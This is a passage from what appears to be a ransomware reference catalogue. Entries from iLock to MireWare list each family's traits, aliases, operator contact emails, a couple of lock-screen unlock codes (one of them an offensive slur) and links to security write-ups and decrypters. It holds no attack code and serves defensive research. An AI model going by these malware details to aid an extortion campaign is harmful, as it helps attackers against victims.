</table>
</div>
<div class="sect2">
<h3 id="_ilock"><a class="anchor" href="#_ilock"></a><a class="link" href="#_ilock">iLock</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2013. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/817085367144873985">https://twitter.com/BleepinComputer/status/817085367144873985</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ilocklight"><a class="anchor" href="#_ilocklight"></a><a class="link" href="#_ilocklight">iLockLight</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_international_police_association"><a class="anchor" href="#_international_police_association"></a><a class="link" href="#_international_police_association">International Police Association</a></h3>
<div class="paragraph">
<p>Ransomware CryptoTorLocker2015 variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2014. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.bleepingcomputer.com/Nathan/StopPirates_Decrypter.exe">http://download.bleepingcomputer.com/Nathan/StopPirates_Decrypter.exe</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iransom"><a class="anchor" href="#_iransom"></a><a class="link" href="#_iransom">iRansom</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2015. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/796134264744083460">https://twitter.com/demonslay335/status/796134264744083460</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jagerdecryptor"><a class="anchor" href="#_jagerdecryptor"></a><a class="link" href="#_jagerdecryptor">JagerDecryptor</a></h3>
<div class="paragraph">
<p>Ransomware Prepends filenames</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2016. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/757873976047697920">https://twitter.com/JakubKroustek/status/757873976047697920</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jeiphoos"><a class="anchor" href="#_jeiphoos"></a><a class="link" href="#_jeiphoos">Jeiphoos</a></h3>
<div class="paragraph">
<p>Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.</p>
</div>
<div class="paragraph">
<p>Jeiphoos is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Encryptor RaaS</p>
</li>
<li>
<p>Sarento</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2017. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/RaaS.html">http://www.nyxbone.com/malware/RaaS.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/the-rise-and-fall-of-encryptor-raas/">http://blog.trendmicro.com/trendlabs-security-intelligence/the-rise-and-fall-of-encryptor-raas/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jhon_woddy"><a class="anchor" href="#_jhon_woddy"></a><a class="link" href="#_jhon_woddy">Jhon Woddy</a></h3>
<div class="paragraph">
<p>Ransomware Same codebase as DNRansomware Lock screen password is M3VZ&gt;5BwGGVH</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2018. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/822509105487245317">https://twitter.com/BleepinComputer/status/822509105487245317</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jigsaw"><a class="anchor" href="#_jigsaw"></a><a class="link" href="#_jigsaw">Jigsaw</a></h3>
<div class="paragraph">
<p>Ransomware Has a GUI</p>
</div>
<div class="paragraph">
<p>Jigsaw is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CryptoHitMan</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2019. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/">http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.helpnetsecurity.com/2016/04/20/jigsaw-crypto-ransomware/">https://www.helpnetsecurity.com/2016/04/20/jigsaw-crypto-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/795819556166139905">https://twitter.com/demonslay335/status/795819556166139905</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_job_crypter"><a class="anchor" href="#_job_crypter"></a><a class="link" href="#_job_crypter">Job Crypter</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2020. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/jobcrypter.html">http://www.nyxbone.com/malware/jobcrypter.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://forum.malekal.com/jobcrypter-geniesanstravaille-extension-locked-crypto-ransomware-t54381.html">http://forum.malekal.com/jobcrypter-geniesanstravaille-extension-locked-crypto-ransomware-t54381.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/828914052973858816">https://twitter.com/malwrhunterteam/status/828914052973858816</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_johnycryptor"><a class="anchor" href="#_johnycryptor"></a><a class="link" href="#_johnycryptor">JohnyCryptor</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_kawaiilocker"><a class="anchor" href="#_kawaiilocker"></a><a class="link" href="#_kawaiilocker">KawaiiLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2021. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://safezone.cc/resources/kawaii-decryptor.195/">https://safezone.cc/resources/kawaii-decryptor.195/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keranger"><a class="anchor" href="#_keranger"></a><a class="link" href="#_keranger">KeRanger</a></h3>
<div class="paragraph">
<p>Ransomware OS X Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2022. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.drweb.com/show/?i=9877&amp;lng=en&amp;c=5">http://news.drweb.com/show/?i=9877&amp;lng=en&amp;c=5</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/03/07/new-mac-ransomware-appears-keranger-spread-via-transmission-app/">http://www.welivesecurity.com/2016/03/07/new-mac-ransomware-appears-keranger-spread-via-transmission-app/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keybtc"><a class="anchor" href="#_keybtc"></a><a class="link" href="#_keybtc">KeyBTC</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2023. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keyholder"><a class="anchor" href="#_keyholder"></a><a class="link" href="#_keyholder">KEYHolder</a></h3>
<div class="paragraph">
<p>Ransomware via remote attacker. <a href="mailto:tuyuljahat@hotmail.com">tuyuljahat@hotmail.com</a> contact address</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2024. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/559463/keyholder-ransomware-support-and-help-topic-how-decryptgifhow-decrypthtml">http://www.bleepingcomputer.com/forums/t/559463/keyholder-ransomware-support-and-help-topic-how-decryptgifhow-decrypthtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_killerlocker"><a class="anchor" href="#_killerlocker"></a><a class="link" href="#_killerlocker">KillerLocker</a></h3>
<div class="paragraph">
<p>Ransomware Possibly Portuguese dev</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2025. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/782232299840634881">https://twitter.com/malwrhunterteam/status/782232299840634881</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kimcilware"><a class="anchor" href="#_kimcilware"></a><a class="link" href="#_kimcilware">KimcilWare</a></h3>
<div class="paragraph">
<p>Ransomware websites only</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2026. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it">https://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-kimcilware-ransomware-targets-web-sites-running-the-magento-platform/">http://www.bleepingcomputer.com/news/security/the-kimcilware-ransomware-targets-web-sites-running-the-magento-platform/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_korean"><a class="anchor" href="#_korean"></a><a class="link" href="#_korean">Korean</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2027. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/koreanRansom.html">http://www.nyxbone.com/malware/koreanRansom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kozy_jozy"><a class="anchor" href="#_kozy_jozy"></a><a class="link" href="#_kozy_jozy">Kozy.Jozy</a></h3>
<div class="paragraph">
<p>Ransomware Potential Kit <a href="mailto:selectedkozy.jozy@yahoo.com">selectedkozy.jozy@yahoo.com</a> <a href="mailto:kozy.jozy@yahoo.com">kozy.jozy@yahoo.com</a> <a href="mailto:unlock92@india.com">unlock92@india.com</a></p>
</div>
<div class="paragraph">
<p>Kozy.Jozy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>QC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2028. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/KozyJozy.html">http://www.nyxbone.com/malware/KozyJozy.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/617802/kozyjozy-ransomware-help-support-wjpg-31392e30362e32303136-num-lsbj1/">http://www.bleepingcomputer.com/forums/t/617802/kozyjozy-ransomware-help-support-wjpg-31392e30362e32303136-num-lsbj1/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kratoscrypt"><a class="anchor" href="#_kratoscrypt"></a><a class="link" href="#_kratoscrypt">KratosCrypt</a></h3>
<div class="paragraph">
<p>Ransomware <a href="mailto:kratosdimetrici@gmail.com">kratosdimetrici@gmail.com</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2029. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/746090483722686465">https://twitter.com/demonslay335/status/746090483722686465</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kryptolocker"><a class="anchor" href="#_kryptolocker"></a><a class="link" href="#_kryptolocker">KryptoLocker</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
</div>
<div class="sect2">
<h3 id="_lanran"><a class="anchor" href="#_lanran"></a><a class="link" href="#_lanran">LanRan</a></h3>
<div class="paragraph">
<p>Ransomware Variant of open-source MyLittleRansomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2030. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/847689644854595584">https://twitter.com/struppigel/status/847689644854595584</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lechiffre"><a class="anchor" href="#_lechiffre"></a><a class="link" href="#_lechiffre">LeChiffre</a></h3>
<div class="paragraph">
<p>Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2031. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/lechiffre">https://decrypter.emsisoft.com/lechiffre</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/01/lechiffre-a-manually-run-ransomware/">https://blog.malwarebytes.org/threat-analysis/2016/01/lechiffre-a-manually-run-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lick"><a class="anchor" href="#_lick"></a><a class="link" href="#_lick">Lick</a></h3>
<div class="paragraph">
<p>Ransomware Variant of Kirk</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2032. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/842404866614038529">https://twitter.com/JakubKroustek/status/842404866614038529</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_linux_encoder"><a class="anchor" href="#_linux_encoder"></a><a class="link" href="#_linux_encoder">Linux.Encoder</a></h3>
<div class="paragraph">
<p>Ransomware Linux Ransomware</p>
</div>
<div class="paragraph">
<p>Linux.Encoder is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Linux.Encoder.{0,3}</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2033. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/">https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lk_encryption"><a class="anchor" href="#_lk_encryption"></a><a class="link" href="#_lk_encryption">LK Encryption</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2034. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/845183290873044994">https://twitter.com/malwrhunterteam/status/845183290873044994</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lltp_locker"><a class="anchor" href="#_lltp_locker"></a><a class="link" href="#_lltp_locker">LLTP Locker</a></h3>
<div class="paragraph">
<p>Ransomware Targeting Spanish speaking victims</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2035. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/">https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_locker"><a class="anchor" href="#_locker"></a><a class="link" href="#_locker">Locker</a></h3>
<div class="paragraph">
<p>Ransomware has GUI</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2036. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545">http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_locklock"><a class="anchor" href="#_locklock"></a><a class="link" href="#_locklock">LockLock</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2037. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/626750/locklock-ransomware-locklock-help-support/">https://www.bleepingcomputer.com/forums/t/626750/locklock-ransomware-locklock-help-support/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_locky"><a class="anchor" href="#_locky"></a><a class="link" href="#_locky">Locky</a></h3>
<div class="paragraph">
<p>Ransomware Affiliations with Dridex and Necurs botnets</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2038. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-locky-version-adds-the-zepto-extension-to-encrypted-files/">http://www.bleepingcomputer.com/news/security/new-locky-version-adds-the-zepto-extension-to-encrypted-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-locky-ransomware-spotted-in-the-brazilian-underground-market-uses-windows-script-files/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-locky-ransomware-spotted-in-the-brazilian-underground-market-uses-windows-script-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/2016/10/06/odin-ransomware-takes-over-from-zepto-and-locky/">https://nakedsecurity.sophos.com/2016/10/06/odin-ransomware-takes-over-from-zepto-and-locky/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-egyptian-mythology-with-the-osiris-extension/">https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-egyptian-mythology-with-the-osiris-extension/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lortok"><a class="anchor" href="#_lortok"></a><a class="link" href="#_lortok">Lortok</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_lowlevel04"><a class="anchor" href="#_lowlevel04"></a><a class="link" href="#_lowlevel04">LowLevel04</a></h3>
<div class="paragraph">
<p>Ransomware Prepends filenames</p>
</div>
</div>
<div class="sect2">
<h3 id="_m4n1f3sto"><a class="anchor" href="#_m4n1f3sto"></a><a class="link" href="#_m4n1f3sto">M4N1F3STO</a></h3>
<div class="paragraph">
<p>Ransomware Does not encrypt Unlock code=suckmydicknigga</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2039. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/808015275367002113">https://twitter.com/jiriatvirlab/status/808015275367002113</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mabouia"><a class="anchor" href="#_mabouia"></a><a class="link" href="#_mabouia">Mabouia</a></h3>
<div class="paragraph">
<p>Ransomware OS X ransomware (PoC)</p>
</div>
</div>
<div class="sect2">
<h3 id="_macandchess"><a class="anchor" href="#_macandchess"></a><a class="link" href="#_macandchess">MacAndChess</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
</div>
<div class="sect2">
<h3 id="_magic"><a class="anchor" href="#_magic"></a><a class="link" href="#_magic">Magic</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
</div>
<div class="sect2">
<h3 id="_maktublocker"><a class="anchor" href="#_maktublocker"></a><a class="link" href="#_maktublocker">MaktubLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2040. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/">https://blog.malwarebytes.org/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_marsjoke"><a class="anchor" href="#_marsjoke"></a><a class="link" href="#_marsjoke">MarsJoke</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2041. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.ru/blog/issledovaniya/29376/polyglot-the-fake-ctb-locker/">https://securelist.ru/blog/issledovaniya/29376/polyglot-the-fake-ctb-locker/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/MarsJoke-Ransomware-Mimics-CTB-Locker">https://www.proofpoint.com/us/threat-insight/post/MarsJoke-Ransomware-Mimics-CTB-Locker</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_meister"><a class="anchor" href="#_meister"></a><a class="link" href="#_meister">Meister</a></h3>
<div class="paragraph">
<p>Ransomware Targeting French victims</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2042. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/siri_urz/status/840913419024945152">https://twitter.com/siri_urz/status/840913419024945152</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_meteoritan"><a class="anchor" href="#_meteoritan"></a><a class="link" href="#_meteoritan">Meteoritan</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2043. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/844614889620561924">https://twitter.com/malwrhunterteam/status/844614889620561924</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mircop"><a class="anchor" href="#_mircop"></a><a class="link" href="#_mircop">MIRCOP</a></h3>
<div class="paragraph">
<p>Ransomware Prepends files Demands 48.48 BTC</p>
</div>
<div class="paragraph">
<p>MIRCOP is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Crypt888</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2044. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/618457/microcop-ransomware-help-support-lock-mircop/">http://www.bleepingcomputer.com/forums/t/618457/microcop-ransomware-help-support-lock-mircop/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.avast.com/ransomware-decryption-tools#!">https://www.avast.com/ransomware-decryption-tools#!</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/instruction-less-ransomware-mircop-channels-guy-fawkes/">http://blog.trendmicro.com/trendlabs-security-intelligence/instruction-less-ransomware-mircop-channels-guy-fawkes/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Mircop.html">http://www.nyxbone.com/malware/Mircop.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mireware"><a class="anchor" href="#_mireware"></a><a class="link" href="#_mireware">MireWare</a></h3>
<div class="paragraph">
